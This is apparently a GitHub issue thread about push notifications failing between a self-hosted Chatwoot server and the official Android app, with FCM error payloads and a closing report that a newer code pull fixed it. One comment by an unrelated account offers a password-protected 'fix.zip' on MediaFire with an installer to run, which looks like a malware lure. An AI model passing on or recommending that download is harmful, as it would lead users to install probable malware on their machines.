### ISSUE TITLE
Push notifications not working on official app with self hosted chatwoot

### ISSUE THREAD

**Issue by mayank-gc** [chatwoot/chatwoot-mobile-app#813]
We are using self-hosted chatwoot (v3.3.2) with an official android mobile app (v1.10.44)
We have set **ENABLE_PUSH_RELAY_SERVER** to true

After debugging we encountered these errors

**1st error -**
{\n "error": {\n "code": 400,\n "message": "Invalid JSON payload received. Unknown name \"sound\" at 'message.notification': Cannot find field.\nInvalid JSON payload received. Unknown name \"collapse_key\" at 'message': Cannot find field.",\n "status": "INVALID_ARGUMENT",\n "details": [\n {\n "@type": "type.googleapis.com/google.rpc.BadRequest",\n "fieldViolations": [\n {\n "field": "message.notification",\n "description": "Invalid JSON payload received. Unknown name \"sound\" at 'message.notification': Cannot find field."\n },\n {\n "field": "message",\n "description": "Invalid JSON payload received. Unknown name \"collapse_key\" at 'message': Cannot find field."\n }\n ]\n }\n ]\n }\n}\n

After removing sound, collapse_key parameters from https://hub.2.chatwoot.com/send_push API.

**We got another error -**
{\n "error": {\n "code": 400,\n "message": "Recipient of the message is not set.",\n "status": "INVALID_ARGUMENT",\n "details": [\n {\n "@type": "type.googleapis.com/google.rpc.BadRequest",\n "fieldViolations": [\n {\n "field": "message",\n "description": "Recipient of the message is not set."\n }\n ]\n },\n {\n "@type": "type.googleapis.com/google.firebase.fcm.v1.FcmError",\n "errorCode": "INVALID_ARGUMENT"\n }\n ]\n }\n}\n

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mayank-gc** [comment]
It worked with latest code pull.
